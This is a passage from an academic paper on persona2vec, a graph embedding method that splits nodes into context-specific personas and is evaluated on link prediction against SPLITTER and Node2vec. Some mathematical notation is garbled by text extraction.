other completely (Epasto & Perozzi, 2019), we add directed, weighted edges between personas to capture their origin. In doing so, we allow the direct application of the existing graph embedding methods. In addition, we take an approach of considering persona-based learning as fine-tuning of the base graph embedding, achieving both efficiency and balance between information from the original graph and the persona graph. Compared with the previous approach (Epasto & Perozzi, 2019), our framework is conceptually simpler to understand and practically easier to implement. Furthermore, it achieves better performance in the link prediction tasks while being much faster. We also would like to clarify that the primary purpose of persona splitting is not about obtaining multiple representations, each of which may be suited for a specific task; it is about teasing out multiple contexts that a single node may possess. In other words, even with a single task, we argue that learning multiple representations for some nodes is highly beneficial. In sum, we would like to highlight that our approach (1) drastically lowers the barrier for combining existing algorithms with persona splitting, (2) significantly improves the efficiency of the ego-splitting approach, while (3) consistently excelling the previous state-of-the-art model in the link prediction task. Our implementation of persona2vec is publicly available at https://github.com/jisungyoon/persona2vec. RELATED WORK In addition to graph embedding, our work is closely related to the research of identifying overlapping communities in graphs. Various non-embedding methods such as link clustering (Ahn, Bagrow & Lehmann, 2010; Evans & Lambiotte, 2009), clique percolation (Palla et al., 2005), and mixed membership stochastic blockmodel (Airoldi et al., 2008) have been proposed. Another thread of works focuses on using local graph structure to Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 2/20 https://github.com/jisungyoon/persona2vec http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ extract community information (Coscia et al., 2014; Epasto et al., 2015; Epasto, Lattanzi & Paes Leme, 2017). Specifically, Epasto, Lattanzi & Paes Leme (2017) introduce the persona graph method for detecting overlapping communities in graphs, leveraging ego-network partition. The combination of ego-network analysis and graph embedding methods is still rare. An example is SPLITTER (Epasto & Perozzi, 2019), which we use as the baseline in this paper. Instead of constraining the relations between personas with a regularization term, we propose a simpler and more efficient way of adding persona edges to the graph. Our work is also related to the word disambiguation problem in a word embedding. Recently, word embedding techniques (Mikolov et al., 2013a, 2013b; Pennington, Socher & Manning, 2014) have been extensively applied to various NLP tasks as the vectorized word representations can effectively capture syntactic and semantic information. Although some words have multiple senses depending on the context, the original word embedding methods only assign one vector to each word. Li & Jurafsky (2015) shows that embedding that is aware of multiple word senses and provides a vector for each specific sense does improve the performance for some NLP tasks. For this issue, some utilize the local context information and clustering for identifying word sense (Reisinger & Mooney, 2010; Wu & Giles, 2015; Neelakantan et al., 2015), some resort to external lexical database for disambiguation (Rothe & Schütze, 2015; Iacobacci, Pilehvar & Navigli, 2015; Camacho-Collados, Pilehvar & Navigli, 2016; Chen, Liu & Sun, 2014; Jauhar, Dyer & Hovy, 2015; Pelevina et al., 2017), while some combine topic modeling methods with embedding (Liu, Qiu & Huang, 2015; Liu et al., 2015; Cheng et al., 2015; Zhang & Zhong, 2016). We adopt the idea of assigning multiple vectors to each node in the graph to represent different roles as well as exploiting local graph structure for the purpose. PROPOSED METHOD: PERSONA2VEC persona2vec creates a persona graph, where some nodes are split into multiple personas. We then apply a graph embedding algorithm to the persona graph to learn the embeddings of the personas (see Fig. 1). Let us explain the method formally. Let G = (V, E) be a graph with a set of nodes V and a set of edges E. |V| and |E| denote the number of nodes and edges respectively. Let f : v ! Rd be the embedding function that maps a node v to a d-dimensional vector space (d � |V|). Refined ego-splitting We adopt and refine the ego-splitting method (Epasto, Lattanzi & Paes Leme, 2017; Epasto & Perozzi, 2019). For each node in the original graph, we first extract its ego-graph, remove the ego, and identify the local clusters. Every cluster in the ego-graph leads to a new persona node in the persona graph (see Figs. 1A and 1C). For example, if we consider each connected component as a local community with a connected component algorithm, node C in the original graph belongs to two non-overlapping clusters {A,B} and {D,E,F} in its ego-graph. Given these two clusters, in the persona graph, C is split into C1 and C2 to represent the two roles in respective clusters. C1 and C2 inherit the Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 3/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ connections of C from both clusters separately (see Fig. 1C). On the other hand, node A only belongs to one ego cluster {B,C}, so it does not split into multiple personas. Any graph clustering algorithm can be employed for splitting a node into personas. The simplest algorithm is considering each connected component in the ego-network (sans the ego) as a cluster. This approach is fast and works well on sparse graphs. However, in dense graphs, ego-networks are more likely to form fewer connected components, thus other algorithms such as the Louvain method (Blondel et al., 2008), Infomap (Rosvall & Bergstrom, 2008), and label propagation (Raghavan, Albert & Kumara, 2007) would be more appropriate. In previous studies, the personas get disconnected without retaining the information about their origin, creating isolated components in the splitting process (Epasto, Lattanzi & Paes Leme, 2017; Epasto & Perozzi, 2019). Because of this disconnectedness, common embedding methods could not be directly applied to the splitted graph. A previous study attempted to address this issue by imposing a regularization term in the cost function to penalize separation of persona nodes originating from the same node (Epasto & Perozzi, 2019). Here, instead of adopting the regularization strategy, we add weighted persona edges between the personas, maintaining the connectedness between them after the splitting (see Fig. 1C). Because the persona graph stays connected, classical graph algorithms and graph embedding methods can now be readily applied without any modification. As we will show later, our strategy achieves both better scalability and better performance. In the persona graph, we set the weights of the unweighted original edges as 1 and tune the strength of the connections among personas with λ. Persona edges are directed and weighted, with weight λkoi, where k o i is the out-degree of the persona node after splitting (see Fig. 1C). Assigning weight proportional to koi helps the random walker exploring both the local neighbors and other parts of the graph connected to the other personas regardless of the out-degree koi. A B C D E F G H (a) Original graph A B C1 C2 D E F1 F2 G H Original edge Persona edge (c) Persona graph A B C1 C2 .. H (e) Persona embedding d 10 A B C D .. H (b) Base graph embedding d 8 Graph embedding Ego-split Initialize (d) Graph embedding 2λ 3λ 2λ 3λ Figure 1 Illustration of persona2vec framework. (A) A graph with an overlapping community structure. (B) Graph embedding of the original graph is obtained first to initialize the persona embed- dings. (C) Transform the original graph into a persona graph. Every edge in the original graph is preserved in the persona graph, while new directed persona edges with weight λki o are added between the persona nodes. (D) Graph embedding is applied to the persona graph. (E) The final persona embedding where each persona node has its own vector representation. Full-size DOI: 10.7717/peerj-cs.439/fig-1 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 4/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-1 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Imagine node u, which is split into np personas. Consider one of the personas i with out- degree koi and persona edges with weight wi. Then the probability pi that an unbiased random walker at i visits neighbors connected with the original edges at the next step is koi koi þnpwi : (1) If we set constant weight wi = λ, then pi ¼ koi koi þnp� ¼ 1 1þnp koi � ; (2) which depends on koi. A random-walker would not explore its local neighborhood if np � koi, while the opposite happens when np � koi. Instead, assigning the weight proportional to koi, namely wi = λk o i, removes such bias because pi ¼ koi koi þnp�koi ¼ 1 1þnp� ; (3) which is independent of koi. Our experiments also show that using the out-degree yields better performance than assigning the identical weight to each persona edge. Our algorithm for refined ego-splitting is described in Algorithm 1. Note that it can be generalized to the directed graphs. Persona graph embedding As explained above, any graph embedding algorithm that recognizes edge direction and weight can be readily applied to the persona graph. Although we use Node2vec as the embedding method here, other embedding methods can also be employed. We initialize the persona vectors with the vectors from the original graph before ego-splitting (see Fig. 1B) to leverage the information from the original graph structure. Persona nodes that belong to the same node in the original graph are thus initialized with the same vector. We then execute the embedding algorithm for a small number of epochs to fine-tune the embedding vectors with the information from the persona graph (see Fig. 1). Experiments show that usually only one epoch of training is enough. We find that training the embedding on the persona graphs from scratch fails to yield comparable results. Instead, initializing the embedding with the original graphs, i.e., our present method, consistently improves the performance, suggesting that mixing the structural information from both the original graph and the persona graph is crucial. Our full algorithm is described in Algorithm 2. Complexity Space complexity The persona graph is usually larger than the original graph, but not too large. Node u with degree ku may be split into at most ku personas. In the worst case, the number of nodes in the persona graph can reach O(|E|). But, in practice, only a subset of nodes split into Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 5/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ personas, and the number of personas rarely reaches the upper bound. If we look at the persona edges, for a node u with degree ku, at most Oðk2uÞ new persona edges may be added. Thus, the whole persona graph has at most OðjVj�k2maxÞ or O(|V|3) (∵ kmax ≤ |V|) extra persona edges. If graph’s degree distribution follows a power-law distribution P(k) ∼ k−γ, then kmax ∼ |V| 1/γ−1. Hence, it could be O(|V|γ+1/γ−1) and it is between O(|V|2) and O(|V|3) (∼ 2 ≤ γ ≤ 3 in general). However, real graph tends to be sparse and ki � |V|. If we further assume ki < ffiffiffiffiffiffi jEj p holds for every node, then PjVj n¼1 k 2 n � PjVj n¼1 kn ffiffiffiffiffiffi jEj p ¼ 2jEj ffiffiffiffiffiffi jEj p . Under this assumption, the upper bound becomes O(|E|3/2). Similarly, with the scale-free condition, the upper bound could be O(|E||V|1/γ−1), which is between O(|E||V|1/2) and O(|E||V|). Again, in practice, the number of persona edges is much smaller than this upper bound. To illustrate, we list the number of nodes and persona edges in the persona graph for the graphs we use in this paper in Table 1. All considered, the extra nodes and edges do not bring too much space complexity burden in practice. Time complexity Assessing the time complexity requires consideration of the two steps: ego-splitting and embedding. The ego-splitting algorithm has complexity of OðjEj3=2 þ ffiffiffiffiffiffi jEj p TðjEjÞÞ in the worst case, where |E| is the number of edges in the original graph and T(|E|) is the Algorithm 1 Refined ego-splitting for generating the persona graph. Case of the undirected graph. Input: Original graph G(V, E); weight parameter λ; non-overlapping local clustering algorithm C Output: Persona graph GP(VP, EP); node to personas mapping V2P; persona to local cluster mapping P2C 1: function REFEGOSPLIT(G(V, E), λ, C) 2: for each vo ∈ V do 3: Pvo CðvoÞ ⊳ find local clusters of vo 4: for each p ∈ Pvo do 5: Create vp, and add to GP, V2P(vo) ⊳ create persona nodes for local clusters 6: P2C(vp) ) p 7: for each edge (vi, vj) in E do 8: w ) weight of edge 9: for each persona node vp in V2P(vi) do 10: for each persona node v′p in V2P(vi) do 11: if vi ∈ P2C(v′p) and vj ∈ P2C(vp) then 12: Add original edges (vp, v′p, w), (v′p, vp, w) to EP 13: ko ) out-degree sequence after adding original edges 14: for each vo ∈ V do 15: for each pair (vi, vj) in V2P(vo) do 16: Add persona edges (vi, vj, ki o × λ), (vj, vi, kj o × λ) to EP 17: return GP(VP, EP), V2P, P2C Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 6/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ complexity of detecting the ego clusters in the graph with |E| edges (Epasto, Lattanzi & Paes Leme, 2017). The embedding on the persona graph, which dominates the whole embedding procedure, has complexity O(|Vp|γ twd(1 + log(|Vp|))) which is time complexity of Node2vec, where |Vp| is the number of nodes, γ is the number of random walkers, d is the embedding dimension, and w is the window size (Chen et al., 2018). Algorithm 2 persona2vec. Our method for generating persona node embeddings. Input: G(V,E), Original graph d, embedding dimension γb, number of walks per node for base embedding tb, random walk length for base embedding wb, window size for base embedding γp, number of walks per node for persona embedding tp, random walk length for persona embedding wp, window size for persona embedding a, learning rate REFEGOSPLIT, refined ego-splitting method V2P, node to personas mapping EMBEDDINGFUNC, a graph embedding method e.g. DeepWalk, Node2vec Output: �GP , a NP × d matrix with d-dimensional vector representations for all NP persona nodes 1: function PERSONA2VEC(G, d, γb, tb, wb, gp, tp, wp, REFEGOSPLIT, EMBEDDINGFUNC, a) 2: GP, V2P ) REFEGOSPLIT(G) 3: ΦG ) EMBEDDINGFUNC(G, d, γb, tb, wb, a) 4: for each vo ∈ V do 5: for each persona node vp in V2P(vo) do 6: �GP (vp) = ΦG(vo) 7: �GP ) EMBEDDINGFUNC(Gp, γp, tp, wp, a, �GP ) 8: return �GP Table 1 Descriptive statistics of the graphs used in the evaluation. We report the number of nodes |V|, number of edges |E|, number of nodes in the persona graph |Vp|, the ratio of |Vp| over |V|, number of persona edges |Ep| added in ego-splitting, and the ratio of |Ep| over |E 3/2| which is the upper bound of space complexity. Dataset Type Vj j Ej j Vp � � � � Vp � � � �= Vj j Ep � � � � Ep=E2=3 � � � � PPI Undirected 3,863 38,705 16,734 4.34 132,932 0.0175 ca-HepTh Undirected 9,877 25,998 16,071 1.86 33,524 0.0800 ca-AstroPh Undirected 17,903 197,301 25,706 1.44 29,102 0.0003 Wiki-vote Directed 7,066 103,633 21,467 3.04 118,020 0.0035 Soc-epinions Directed 75,877 508,836 220,332 2.90 3,550,594 0.0098 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 7/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ The final complexity is OðjEj3=2 þ ffiffiffiffiffiffi jEj p TðjEjÞÞþOðjVjctwdð1þ logðjVjÞÞÞ. Removing the constant factors and assuming close-to-linear local community detection algorithm, the whole process has time complexity of O(|E|3/2) with space complexity of O(|E|3/2) if ki < ffiffiffiffiffiffi jEj p holds. Complexity can be increased depending on the clustering algorithms on the ego-network. To test the validity of our assumptions, we sample 1,000 graphs from a public network repository (Rossi & Ahmed, 2015). We apply the refined ego-splitting with connected component algorithms on these samples and report the actual number of persona edges |Ep| with respect to the practical upper bound |E| 3/2 in Fig. 2, which shows that the actual number of persona edges |Ep| rarely exceeds the tighter upper bound that we propose and is usually orders of the magnitude smaller. Optimization Any kind of graph embedding method can be considered, for simplicity, we choose the classical random-walker based embedding method (e.g., Node2Vec, DeepWalk). In the model (Perozzi, Al-Rfou & Skiena, 2014), the probability of a node vi co-occurring with a node vj is estimated by pðvijvjÞ¼ expð�0vi � �vjÞ PV k¼1 expð�0vk ��vjÞ ; (4) where �vi and �′vi are the ‘input’ and ‘output’ embedding of node i. We use input embedding � which is known to be more useful and more widely used. Denominator of Eq. (4) is computationally expensive (Yang et al., 2016; Cao, Lu & Xu, 2016) and there are Figure 2 Comparison of the the number of persona edges |Ep| to the practical upper bound |E| 3/2. Full-size DOI: 10.7717/peerj-cs.439/fig-2 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 8/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-2 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ two common approximations: hierarchical softmax (Morin & Bengio, 2005) and negative sampling (Mikolov et al., 2013b). We adopt negative sampling not only because it is simpler and popular but also because it shows better performance. CASE STUDY Before diving into systematic evaluations, we provide two illustrative examples: Zachary’s Karate club network and a word association network. Case study: Zachary’s Karate club network We use Zachary’s Karate club network (Zachary, 1977), a well-known example for the community detection. Nodes represent members of the Karate club, and edges represent ties among the members (see Fig. 3A). Although it is often considered to have two large disjoint communities, smaller overlapping communities can also be seen, highlighted by nodes such as 1, 3, 28, and 32. In Fig. 3B, we present the persona graph of the network. persona2vec successfully recognizes these bridge nodes and places their personas in reasonable locations. Take node 1 for example. It splits into four persona nodes, which then end up in two different communities. The orange and green communities are clearly a b c d Figure 3 Case Study: Zachary’s Karate club network. (A) The Zachary’s Karate club network with the force-atlas layout (Zachary, 1977). Nodes are colored by communities detected by the Louvain mod- ularity method (Blondel et al., 2008). (B) The persona graph. Nodes are colored by k-means clusters (MacQueen, 1967) from the embedding vectors. Coordinates of the persona nodes come from the 2-D projection of the embedding with t-SNE (Maaten & Hinton, 2008). Light gray lines represent the persona edges. (C) The network with 20% of edges (16 edges) removed for the link prediction experiment. (D) The network with ten predictions with the highest scores from the link prediction experiment. Blue links represent correctly predicted edges and red edges indicate incorrectly predicted ones. Full-size DOI: 10.7717/peerj-cs.439/fig-3 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 9/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-3 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ separated as a result. We also show the ten predictions with the highest scores from the link prediction experiment in Fig. 3D and ensure that the model predicts missing edges well. Case study: word association network Word association network captures how people associate words together (free association task). The dataset was originally assembled from nearly 750,000 responses from over 6,000 peoples. Participants were shown 5,019 words and asked to write down the first word that sprang in mind and all the word pairs were collected with their frequency as the weights. This dataset forms a weighted, directed graph of words that captures their multiple senses. Although it is, in principle, possible to run our method on the original graph, for simplicity, we convert it into an undirected, unweighted graph by neglecting weight and direction (Ahn, Bagrow & Lehmann, 2010). In Fig. 4, we show the persona2vec clusters around the word “Newton”. We use the Louvain method (Blondel et al., 2008) to split the personas of each word. persona2vec successfully captures Figure 4 The word association network, clusters around the word “Newton”. Coordinates of the words come from the 2-D projection of the embedding vectors with UMAP (McInnes, Healy & Melville, 2018). Word colors correspond to the clusters obtained by k-means clustering (MacQueen, 1967) on the embedding vectors. Full-size DOI: 10.7717/peerj-cs.439/fig-4 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 10/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-4 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ multiple contexts of the word “Newton”. For instance, the red persona is associated with “scientists” and “philosopher”, the gray one is linked to the physics, and the yellow one is associated with “apple” (note that there is a cookie called “(Fig) Newton” in the U.S.). Furthermore, persona2vec also captures different nuances of the word “law” that are related to the crime (brown cluster) and the legal concepts (orange cluster). NUMERICAL EXPERIMENT Link prediction task To systematically evaluate the performance and scalability of the persona2vec framework, we perform a link prediction task using real-world graphs (Grover & Leskovec, 2016; Abu-El-Haija, Perozzi & Al-Rfou, 2017). Link prediction aims to predict missing edges in a graph with partial information, which is useful for many tasks such as suggesting new friends on social networks or recommending products. It has been employed as a primary task to evaluate the performance of unsupervised graph embedding methods (Abu-El-Haija, Perozzi & Al-Rfou, 2017; Zhang et al., 2018). We follow the task setup from the literature (Grover & Leskovec, 2016; Abu-El-Haija, Perozzi & Al-Rfou, 2017). First, the edge set of an input graph is divided equally and randomly into Etrain and Etest. We then refine Etest using a rejection sampling method based on the criterion that, even when we remove all edges in Etest, the graph should be connected as a single component. Etrain is used to train the models, and edges in Etest are used as positive examples for the prediction task. Second, a negative edge set E(−) of non-existent random edges with the same size of Etest are generated to provide negative examples for testing. The performance of a model is measured by its ability to correctly distinguish Etest and E(−) after being trained on Etrain. We then report ROC-AUC. Datasets To facilitate the comparison with the state-of-the-art baseline, we use five graph datasets that are publicly available and previously used (Epasto & Perozzi, 2019; Leskovec & Krevl, 2014). We summarize them as follows. PPI is a protein-protein interaction graph of Homo sapiens (Stark et al., 2006). Nodes represent proteins and edges represent physical interactions between the proteins. ca-HepTh is a scientific collaboration graph. It represents the co-authorship among researchers from the Theoretical High Energy Physics field, derived from papers on arXiv. ca-AstropPh is also scientific collaboration graph, but from Astrophysics. wiki-vote is a voting network, each node is a Wikipedia user and a directed edge from node i to node j represents that user i voted for user j to become an administrator. soc-epinions is a voting graph from a general consumer review site Epinions.com, each node is a member, and a directed edge from node i to node j means that member i trusted member j. We use the largest connected component of the undirected graphs and the largest weakly connected component of the directed ones. The statistics of all the graphs are reported in Table 1. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 11/20 http://Epinions.com http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Methods The state-of-the-art method in this link prediction task is SPLITTER (Epasto & Perozzi, 2019), which also models multiple roles. As reported in the paper, it outperforms various exiting algorithms ranging across non-embedding methods like Jaccard Coefficient, Common Neighbors, and Adamic-Adar as well as embedding methods like Laplacian EigenMaps (Belkin & Niyogi, 2002), Node2vec (Grover & Leskovec, 2016), DNGR (Cao, Lu & Xu, 2016), Asymmetric (Abu-El-Haija, Perozzi & Al-Rfou, 2017) and M-NMF (Wang et al., 2017). Given the state-of-the-art performance of SPLITTER, for simplicity, we compare our framework with SPLITTER using the identical task setup and datasets. In addition, because our method can be considered as an augmentation of a single-role embedding method, and because we use Node2vec as the base embedding method, we also employ Node2vec. We run the link prediction task using the original authors’ implementation of Node2vec and SPLITTER. The parameters are also kept consistent with the original paper. persona2vec and SPLITTER have multiple representations on each node, which leads to non-unique similarity estimations between two nodes. Hence, we define the similarity score of a pair of nodes on persona2vec as the maximum dot-product of embedding vectors between any pair of their personas. We found that, among experiments with three aggregation functions min, max, mean, the highest performance is achieved with max, the same with SPLITTER (Epasto & Perozzi, 2019). For SPLITTER, we use maximum cosine similarity, following the author’s note in their implementation. Node2vec (baseline method) For Node2vec, we set random walk length t = 40, the number of walks per node γ = 10, random walk parameters p = q = 1, the window size w = 5, and the initial learning rate a = 0.025. In the original paper, they learn an additional logistic regression classifier over the Hadamard product of the embedding of two nodes for the link prediction. In general, the logistic regression classifier improves the performance. Here, we report results on Node2vec with both dot products and the logistic regression classifier. SPLITTER (baseline method) For SPLITTER, we use the same parameters in the paper (Epasto & Perozzi, 2019) and aforementioned Node2vec baseline. We use Node2vec with random walk parameters p = q = 1. persona2vec (our proposed method) We set the hyper-parameters of the original graph embedding with tb = 40, γb = 10, wb = 5. For the persona embedding, we set tp = 80, γp = 5, wp = 2 to better capture the micro- structure of the persona graph. The size of the total trajectories is determined by the random walk length t� times the number of walks per node γ�, so we keep t�γ� constant to roughly preserve the amount of information used in the embedding. For both embedding stages, we use a = 0.025, and Node2vec with the random walk parameters (p = q = 1) as the graph embedding function. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 12/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Experiment results Figure 5 shows the link prediction performance of persona2vec in comparison with the baselines. Overall, persona2vec yields superior performance across graphs and across a range of hyperparameter choices. We show that augmenting Node2vec by considering personas significantly improves the link prediction performance, evinced by the significant performance gain (see Table 2). As expected, larger dimensions lead to better performance, although persona2vec achieves reasonable results even with tiny embedding dimensions like 8 or 16. We also show how the performance of persona2vec varies with λ. For undirected graphs, larger λ is beneficial but the trend saturates quickly. For directed graphs, however, optimal performance is achieved with smaller values of λ. In practice, we suggest starting with λ = 0.5 as a default parameter because the overall variation brought by λ is not substantial and even when the performance increases with λ, near-optimal performance can be achieved at λ = 0.5. When compared with the SPLITTER baseline, persona2vec shows on par or better performances given the same embedding dimensions across a wide range of λ. We also a b c d e Figure 5 Performance of persona2vec in the link prediction task. We report the link prediction performance for each graphs for (A) PPI, (B) ca-HepTh, (C) ca-AstroPh, (D) wiki-vote, and (E) SOC-epinions. Number of epochs n is set to 1 in all experiments for persona2vec. Darker colors represent higher embedding dimensions. The confidence intervals are all within the range of the markers. Given the same number of dimensions, persona2vec is always on par with or better than SPLITTER. Full-size DOI: 10.7717/peerj-cs.439/fig-5 Table 2 Performance of persona2vec with λ = 0.5. All methods use d = 128. Node2vec* refers to Node2vec with the logistic regression classifier, SPLITTER* refers to SPLITTER with one epoch, and persona2vec* refers persona2vec with λ = 0.5, our suggested default. Performance gain is perfor- mance difference between persona2vec* and Node2vec. We omit the standard error which is smaller than 10−3. Bold numbers represent the best performance. Method PPI ca-HepTH ca_AstroPh wiki-vote soc-epinions Node2vec 0.585 0.825 0.901 0.694 0.547 ± 0.007 Node2vec* 0.662 ± 0.001 0.848 0.914 0.705 ± 0.001 0.767 ± 0.002 SPLITTER 0.856 0.903 0.982 0.931 0.961 ± 0.001 SPLITTER* 0.853 0.898 0.984 0.931 0.954 ± 0.001 persona2vec* 0.879 0.927 0.985 0.936 0.961 Performace_gain 0.294 0.102 0.084 0.242 0.414 ± 0.007 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 13/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-5 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ report the performance summary for persona2vec with λ = 0.5 (our suggested default) compared with the best baselines in Table 2, which shows that persona2vec outperforms the baseline consistently. Also, we report the performance gain of persona2vec from Node2vec, because we used Node2vec as the base embedding method and persona2vec can be considered as an augmentation or fine-tuning of the base Node2vec vectors with local structural information. As shown, the persona-based fine-tuning significantly improves the performance. We also study the effect of different optimization methods, i.e., hierarchical softmax and negative sampling in Fig. 6. We also find that cosine similarity consistently yields a better result with hierarchical softmax while dot product yields a better result with negative sampling regardless of the embedding methods. So, we use cosine similarity for hierarchical softmax and use dot product for negative sampling. Our experiments suggest that persona2vec tends to perform better with negative sampling while SPLITTER works better with hierarchical softmax. Nevertheless, persona2vec yields the best performance consistently. In addition to the performance of the link prediction task, we also report the execution time of persona2vec and SPLITTER to compare their scalability in practice (see Fig. 7). Note that the reported execution time is from the link-prediction task, with half of the edges removed from the original graph. SPLITTER runs the embedding procedures for 10 epochs by default in the original implementation, whereas persona2vec only runs for one epoch. For a fair comparison, we also report the results of SPLITTER with one epoch of training. When being limited to only one epoch, SPLITTER’s performance slightly suffers on three graphs while it goes up or stays stable for the other two. undirected directed a b c d e Figure 6 Comparison of link prediction performance between persona2vec and SPLITTER with different approximations. We report the link prediction performance across optimization methods for each graphs for (A) PPI, (B) ca-HepTh, (C) ca-AstroPh, (D) wiki-vote, and (E) SOC- epinions. HS refers to the hierarchical softmax and NS refers to the negative sampling. The star marker indicates the best link prediction perfor- mance. Full-size DOI: 10.7717/peerj-cs.439/fig-6 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 14/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-6 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Nevertheless, persona2vec is more efficient—39 to 58 times faster than SPLITTER with 10 epochs and five to eight times faster than SPLITTER with one epoch. The most likely reason behind the drastic difference is the overhead from the extra regularization term in the cost function of SPLITTER, which persona2vec does not need. In sum, persona2vec outperforms the previous state-of-the-art method both in terms of scalability and link prediction performance. CONCLUSIONS We present persona2vec, a framework for learning multiple node representations considering the node’s local structural contexts. persona2vec first performs ego-splitting, where nodes with multiple non-overlapping local communities in their ego-networks are replaced with corresponding persona nodes. The persona nodes inherit the edges from the original graph and remain connected by newly added persona edges, forming the persona graph. Initialized by the embedding of the original graph, the embedding algorithm applied to the persona graph yields the final representations. Instead of assigning only one vector to every node with multiple roles, persona2vec learns a vector for each of the personas. With extensive link prediction evaluations, we demonstrate that persona2vec achieves the state-of-the-art performance while being able to scale better. Moreover, our method is easy to comprehend and implement without losing any flexibility for incorporating other embedding algorithms, presenting great potential for Figure 7 Comparison of elapsed time between persona2vec and SPLITTER. Speed gains by per- sona2vec are shown. Full-size DOI: 10.7717/peerj-cs.439/fig-7 Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 15/20 http://dx.doi.org/10.7717/peerj-cs.439/fig-7 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ applications. The possible combination with various algorithms provides vast space for further exploration. For instance, in a multi-layer network, inter-layer coupling connection can be interpreted as natural persona edges, and persona2vec may be applied to tackle the multi-layer link prediction problem. The graph (relational) structure is ubiquitous across many complex systems, including physical, social, economic, biological, neural, and information systems, and thus fundamental graph algorithms have far-reaching impacts across many areas of sciences. Graph embedding, in particular, removes the barrier of translating methods to the special graph data structure, opening up a powerful way to transfer existing algorithms to the graphs and relational data. Furthermore, given that it is natural to assume that overlapping clusters and their heterogeneous functionality exist in most real networks, multi-role embedding methods may find numerous applications in physical, biological, and social sciences. ACKNOWLEDGEMENTS For their comments, we thank Sadamori Kojaku, Alessandro Flammini, Filippo Menczer, Xiaoran Yan, Filipi Nascimento Silva, and Minwoo Ahn. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by the Air Force Office of Scientific Research under award number FA9550-191-0391. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Air Force Office of Scientific Research: FA9550-191-0391. Competing Interests The authors declare that they have no competing interests. Author Contributions � Jisung Yoon conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Kai-Cheng Yang conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Woo-Sung Jung conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Yong-Yeol Ahn conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 16/20 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: The prepossessed version of PPI is available at Stanford University: https://snap. stanford.edu/node2vec/. Other graphs (ca-AstroPh, ca-HepTh, wiki-Vote, soc-Epinions1) are also available at the SNAP library: http://snap.stanford.edu/data/index.html. Code is available at GitHub: https://github.com/jisungyoon/persona2vec. REFERENCES Abu-El-Haija S, Perozzi B, Al-Rfou R. 2017. Learning edge representations via low-rank asymmetric projections. In: Proceedings of the 2017 ACM on Conference on Information and Knowledge Management, CIKM ’17. New York: ACM, 1787–1796. Ahn Y-Y, Bagrow JP, Lehmann S. 2010. Link communities reveal multiscale complexity in networks. Nature 466(7307):761–764 DOI 10.1038/nature09182. Airoldi EM, Blei DM, Fienberg SE, Xing EP. 2008. Mixed membership stochastic blockmodels. Journal of Machine Learning Research 9(September):1981–2014. Belkin M, Niyogi P. 2002. Laplacian eigenmaps and spectral techniques for embedding and clustering. In: Proceedings of the 14th International Conference on Neural Information Processing Systems: Natural and Synthetic. Cambridge: MIT Press, 585–591. Blondel VD, Guillaume J-L, Lambiotte R, Lefebvre E. 2008. Fast unfolding of communities in large networks. Journal of Statistical Mechanics: Theory and Experiment 2008(10):P10008 DOI 10.1088/1742-5468/2008/10/P10008. Camacho-Collados J, Pilehvar MT, Navigli R. 2016. Nasari: integrating explicit knowledge and corpus statistics for a multilingual representation of concepts and entities. Artificial Intelligence 240(1):36–64 DOI 10.1016/j.artint.2016.07.005. Cao S, Lu W, Xu Q. 2016. Deep neural networks for learning graph representations. In: Proceedings of the Thirtieth AAAI Conference on Artificial Intelligence. AAAI Press, 1145–1152. Chen H, Perozzi B, Hu Y, Skiena S. 2018. Harp: hierarchical representation learning for networks. In: Thirty-Second AAAI Conference on Artificial Intelligence. New Orleans: AAAI Press. Chen X, Liu Z, Sun M. 2014. A unified model for word sense representation and disambiguation. 